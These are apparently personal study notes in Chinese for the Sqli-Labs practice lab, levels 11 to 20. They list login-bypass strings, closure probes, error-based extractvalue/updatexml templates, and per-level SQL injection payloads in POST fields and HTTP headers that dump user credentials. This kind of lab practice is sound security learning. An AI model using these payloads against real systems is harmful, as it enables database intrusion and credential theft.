Sqli-Labs做题笔记:Less-11 - Less-20

SQL注入分类：

1. 可回显的注入：
   • 可以联合查询的注入
   • 报错注入
   • 通过注入进行DNS请求，从而达到回显的目的
2. 不可回显的注入：
   • Bool盲注
   • 时间盲注
3. 二次注入

万能语句：

• 1 or 1=1 – #
• 1’ or 1=1 – #
• 1" or 1=1 – #
• 1) or 1=1 – #
• 1’) or 1=1 – #
• 1") or 1=1 – #
• 1)) or 1=1 – #
• 1’) or 1=1-- #
• 1") or 1=1-- #

判断闭合:

• uname=1&passwd=1 or 1=1–+
• uname=1&passwd=1’ or 1=1–+
• uname=1&passwd=1" or 1=1–+
• uname=1&passwd=1’) or 1=1–+
• uname=1&passwd=1") or 1=1–+

报错注入：

extractvalue(1,concat(0x7e,(select database()),0x7e))

updatexml(1,concat(0x7e,(select database()),0x7e),1)

POST请求

Less-11:

uname=aa'+union+select+group_concat(username),group_concat(password)+from+security.users --+&passwd=aa&submit=Submit

Less-12:

uname=aa")+union+select+group_concat(username),group_concat(password)+from+security.users --+&passwd=aa&submit=Submit

Less-13:

uname=aa')+union+select+updatexml(1,concat(0x7e,(substr((SELECT+group_concat(username,0x7e,password)+from+security.users),1)),0x7e),1)+--+&passwd=aa&submit=Submit

Less-14:

uname=aa"+union+select+updatexml(1,concat(0x7e,(substr((SELECT+group_concat(username,0x7e,password)+from+security.users),1)),0x7e),1)+--+&passwd=aa&submit=Submit

Less-15:

uname=1&passwd=1' or If(ascii(substr(database(),1,1))=115,1,sleep(5))-- #

Less-16:

uname=aa&passwd=aa") or substr(database(),1,1)='s' -- #&submit=Submit

Less-17:

uname=admin&passwd=a' or  extractvalue(1,concat(0x7e,(select * from (select concat_ws(0x7e,id,username,password)from users limit 2,1)a)))--+&submit=Submit

Less-18:

User-Agent:' and extractvalue(1,concat(0x7e,(select group_concat(username,0x7e,password) from security.users where username not in ('Dumb','Angelina')),0x7e)) and '

Less-19:

Referer:' and extractvalue(1,concat(0x7e,(select group_concat(username,0x7e,password) from security.users where username not in ('Dumb','Angelina')),0x7e)) and '

Less-20:

Cookie: uname=1' or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))-- #